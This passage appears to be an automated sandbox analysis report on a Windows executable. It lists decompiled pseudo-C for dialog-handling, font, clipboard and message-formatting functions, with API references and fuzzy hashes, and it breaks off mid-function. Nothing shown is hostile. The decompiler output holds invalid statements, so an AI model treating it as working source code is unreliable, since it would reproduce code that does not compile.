0x00407038
0x00407028
0x0040703f

APIs

memset.MSVCRT ref: 00406FAD
GetDlgCtrlID.USER32 ref: 00406FB8
GetWindowTextW.USER32 ref: 00406FCF
memset.MSVCRT ref: 00406FF6
GetClassNameW.USER32 ref: 0040700D
_wcsicmp.MSVCRT ref: 0040701F

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

sysdatetimepick32, xrefs: 00407019

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004052B3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004052B3(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x004052b3
0x004052c1
0x004052c9
0x004052ce
0x004052d8
0x004052e0
0x004052e2
0x004052e2
0x004052e0
0x004052fe
0x0040532d
0x00405300
0x0040530b
0x00405313
0x00405319
0x0040531d
0x0040531d
0x00405337

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
wcslen.MSVCRT ref: 00405303
wcscpy.MSVCRT ref: 00405313
LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
wcscpy.MSVCRT ref: 0040532D

Strings

netmsg.dll, xrefs: 004052D3

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);
				_t25 = 0x60;
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}

0x0040104f
0x00401054
0x0040105f
0x00401060
0x00401065
0x00401068
0x0040107b
0x00401087
0x0040109f
0x004010a5
0x004010a7
0x004010ae
0x00000000
0x004010c1
0x004010c6

APIs

GetDC.USER32(00000000), ref: 00401049
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
ReleaseDC.USER32 ref: 00401068

Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D

CreateFontIndirectW.GDI32(?), ref: 00401087
SendDlgItemMessageW.USER32 ref: 004010A5
SendDlgItemMessageW.USER32 ref: 004010C1

Strings

MS Sans Serif, xrefs: 00401076

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
String ID: MS Sans Serif
API String ID: 1274520933-168460110
Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68

Uniqueness

Uniqueness Score: -1.00%

Function 00403333, Relevance: 12.2, APIs: 8, Instructions: 199
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);
						__eflags = _t77 & 0x00000002;
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;
							__eflags = 0x0000f000 & _t134;
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0xc);
								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t158 + 0x48)) = 1;
								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t158 + 0x48)) = 0;
								return 1;
							}
							L37:
							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
							__eflags = _t91 & 0x00000002;
							if((_t91 & 0x00000002) != 0) {
								_t92 = _t91 & 0x0000f000;
								__eflags = _t92 - 0x1000;
								_a8 = _t92;
								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
								_a8 - 0x2000 = _a8 == 0x2000;
								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t151 + 0x18) & 0x00000002;
						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t100 = _t75 - 0xc2;
				if(_t100 == 0) {
					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
					E004031BE(_t158);
					E00405B17(_t149,  *(_t158 + 0x10), 0);
					goto L27;
				}
				_t104 = _t100 - 1;
				if(_t104 != 0) {
					goto L27;
				}
				_t128 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
					L7:
					if(_t128 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ec) {
							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ee) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t158 + 0x10), 2);
						}
						if(_a8 == 1) {
							E0040314A(_t158);
							EndDialog( *(_t158 + 0x10), 1);
						}
						return 1;
					}
					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
					_t132 = 0;
					if(_t131 <= 0) {
						L12:
						E004031BE(_t158);
						goto L13;
					}
					_t150 = 0;
					do {
						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
						 *(_t122 + 2) = _t132;
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
						_t132 = _t132 + 1;
						_t150 = _t150 + 0x14;
						 *_t122 = _t157;
					} while (_t132 < _t131);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004030F2(__ecx, __ecx);
						goto L7;
					}
				}
			}

0x00403333
0x00403339
0x0040333f
0x00403341
0x00403481
0x00403484
0x0040348d
0x0040348f
0x00403492
0x00403499
0x0040349f
0x00403492
0x004034a0
0x004034a4
0x00403478
0x00403478
0x00000000
0x004034a6
0x004034a6
0x004034a9
0x00000000
0x00000000
0x004034ab
0x004034ae
0x004034b5
0x004034bd
0x004034c0
0x004034c2
0x004034c4
0x00403511
0x00403511
0x00403515
0x00000000
0x00000000
0x0040351b
0x0040351f
0x00000000
0x00000000
0x00403529
0x00403537
0x00403545
0x00403553
0x00403571
0x00403574
0x0040357a
0x00000000
0x0040357d
0x004034c6
0x004034d0
0x004034d8
0x004034da
0x004034dc
0x004034e0
0x004034e8
0x004034f3
0x00403501
0x0040350c
0x0040350c
0x00000000
0x004034da
0x004034b7
0x004034bb
0x00000000
0x00000000
0x00000000
0x004034bb
0x004034a4
0x00403347
0x0040334c
0x00403460
0x00403467
0x00403471
0x00000000
0x00403477
0x00403352
0x00403353
0x00000000
0x00000000
0x0040335c
0x00403362
0x0040337c
0x0040337f
0x00000000
0x00000000
0x0040338b
0x004033c0
0x004033d1
0x004033d9
0x004033d9
0x004033e4
0x004033ec
0x004033ec
0x004033f7
0x00403402
0x00403408
0x0040340f
0x0040341a
0x00403420
0x0040342c
0x00403433
0x00403433
0x0040343a
0x0040343e
0x00403448
0x00403448
0x00000000
0x0040344c
0x00403390
0x00403393
0x00403397
0x004033ba
0x004033bb
0x00000000
0x004033bb
0x00403399
0x0040339b
0x004033a0
0x004033a3
0x004033aa
0x004033af
0x004033b0
0x004033b5
0x004033b5
0x00000000
0x0040336b
0x00403371
0x00000000
0x00403377
0x00403377
0x00000000
0x00403377
0x00403371

APIs

GetDlgItem.USER32 ref: 004033D7
GetDlgItem.USER32 ref: 004033EA
GetDlgItem.USER32 ref: 004033FF
GetDlgItem.USER32 ref: 00403417
EndDialog.USER32(?,00000002), ref: 00403433
EndDialog.USER32(?,00000001), ref: 00403448

Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114

SendDlgItemMessageW.USER32 ref: 00403460
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403584, Relevance: 12.1, APIs: 8, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t74;
				signed int _t76;
				void* _t78;
				void** _t80;
				signed int _t84;
				void* _t88;
				signed int _t89;

				_t78 = __edi;
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x44)) = __eax;
				L0040E038();
				if(__eax == 0) {
					_t80 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t80 = __eax;
				}
				 *(_t78 + 0x40) = _t80;
				_t39 =  *_t80;
				_t88 = _t39;
				if(_t88 != 0) {
					_push(_t39);
					L0040E032();
					 *_t80 = 0;
				}
				_t80[2] = _a8;
				_t41 = E0040299A(_a8);
				_t74 = 4;
				_t80[1] = _t41;
				_t42 = _t41 * _t74;
				_push( ~(0 | _t88 > 0x00000000) | _t42);
				L0040E038();
				 *_t80 = _t42;
				memset(_t42, 0, _t80[1] << 2);
				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
				_t89 =  *(_t78 + 0x44);
				if(_t89 == 0) {
					_t84 = ( *(_t78 + 0x40))[1];
					_t76 = 0x14;
					_t53 = _t84 * _t76;
					_push( ~(0 | _t89 > 0x00000000) | _t53);
					L0040E038();
					 *(_t78 + 0x44) = _t53;
					if(_t84 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
					}
					_v8 = 1;
				}
				if(E0040152F(0x448, _t78, _a4) == 1) {
					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t78 + 0x44));
					L0040E032();
					return _t47;
				}
				return _t47;
			}

0x00403584
0x0040358c
0x0040358e
0x00403591
0x00403594
0x0040359c
0x004035a4
0x0040359e
0x0040359e
0x004035a0
0x004035a0
0x004035a6
0x004035a9
0x004035ab
0x004035ad
0x004035af
0x004035b0
0x004035b6
0x004035b6
0x004035bc
0x004035bf
0x004035c8
0x004035c9
0x004035cc
0x004035d5
0x004035d6
0x004035e4
0x004035e6
0x004035f4
0x004035f9
0x004035fc
0x00403601
0x00403608
0x0040360b
0x00403614
0x00403615
0x0040361d
0x00403620
0x00403622
0x00403624
0x00403627
0x0040362f
0x00403632
0x00403632
0x00403624
0x00403635
0x00403635
0x0040364d
0x00403655
0x00403662
0x00403662
0x0040366b
0x00403676
0x00403678
0x0040367b
0x00000000
0x00403680
0x00403682

APIs

??2@YAPAXI@Z.MSVCRT ref: 00403594
??3@YAXPAX@Z.MSVCRT ref: 004035B0
??2@YAPAXI@Z.MSVCRT ref: 004035D6
memset.MSVCRT ref: 004035E6
??2@YAPAXI@Z.MSVCRT ref: 00403615
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00403662
SetFocus.USER32(?,?,?,?), ref: 0040366B
??3@YAXPAX@Z.MSVCRT ref: 0040367B

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
Opcode Fuzzy Hash: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54

Uniqueness

Uniqueness Score: -1.00%

Function 004054F1, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004054F1(void* _a4) {
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;
				_t20 = 0;
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;
					_t18 = GlobalAlloc(0x2000, _t14);
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);
					}
				}
				CloseClipboard();
				return _t20;
			}

0x004054f2
0x004054f7
0x004054f9
0x00405501
0x00405506
0x0040550c
0x0040550c
0x0040551c
0x00405520
0x0040552c
0x00405535
0x0040553e
0x00405548
0x0040554a
0x0040554a
0x0040554d
0x0040554e
0x00405558

APIs

EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
wcslen.MSVCRT ref: 00405506
GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
GlobalLock.KERNEL32 ref: 00405523
memcpy.MSVCRT ref: 0040552C
GlobalUnlock.KERNEL32(00000000), ref: 00405535
SetClipboardData.USER32 ref: 0040553E
CloseClipboard.USER32(?,?,0040AE96,00000000), ref: 0040554E

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9

Uniqueness

Uniqueness Score: -1.00%

Function 004078E1, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
				return E00407861(_t133);
			}

0x004078e1
0x004078e4
0x004078e5
0x004078e9
0x004078f4
0x004078f7
0x004078ff
0x00407905
0x00407906
0x00407910
0x00407913
0x00407918
0x00407922
0x00407923
0x00407928
0x00407932
0x00407935
0x0040793e
0x0040793f
0x00407945
0x0040794b
0x0040794e
0x00407951
0x00407959
0x00407962
0x00407969
0x00407973
0x0040797e
0x00407985
0x0040798d
0x00407990
0x00407994
0x004079ad
0x004079b1
0x004079b9
0x004079bc
0x004079bc
0x004079c0
0x004079c3
0x004079c9
0x004079c9
0x004079d1
0x004079d7
0x004079da
0x004079df
0x004079e0
0x004079e3
0x004079e8
0x004079f3
0x004079f4
0x004079f9
0x004079fb
0x004079fe
0x00407a03
0x00407a09
0x00407a18
0x00407a18
0x00407a0b
0x00407a11
0x00407a11
0x00407a1a
0x00407a25
0x00407a28
0x00407a2b
0x00407a31
0x00407a37
0x00407a3d
0x00407a43
0x00407a49
0x00407a53
0x00407a63

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??2@YAPAXI@Z.MSVCRT ref: 00407923
??2@YAPAXI@Z.MSVCRT ref: 0040793F
memcpy.MSVCRT ref: 00407962
memcpy.MSVCRT ref: 00407973
??2@YAPAXI@Z.MSVCRT ref: 004079F4
??2@YAPAXI@Z.MSVCRT ref: 004079FE

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Strings

x"A, xrefs: 004079C3

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: x"A
API String ID: 975042529-63625180
Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BE, Relevance: 10.6, APIs: 7, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E004031BE(intOrPtr _a4) {
				struct HWND__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v56;
				char* _v60;
				void* _v72;
				void _v582;
				char _v584;
				struct HWND__* _t52;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t82;
				intOrPtr _t87;
				signed int _t89;
				short* _t90;
				void* _t92;
				void* _t93;

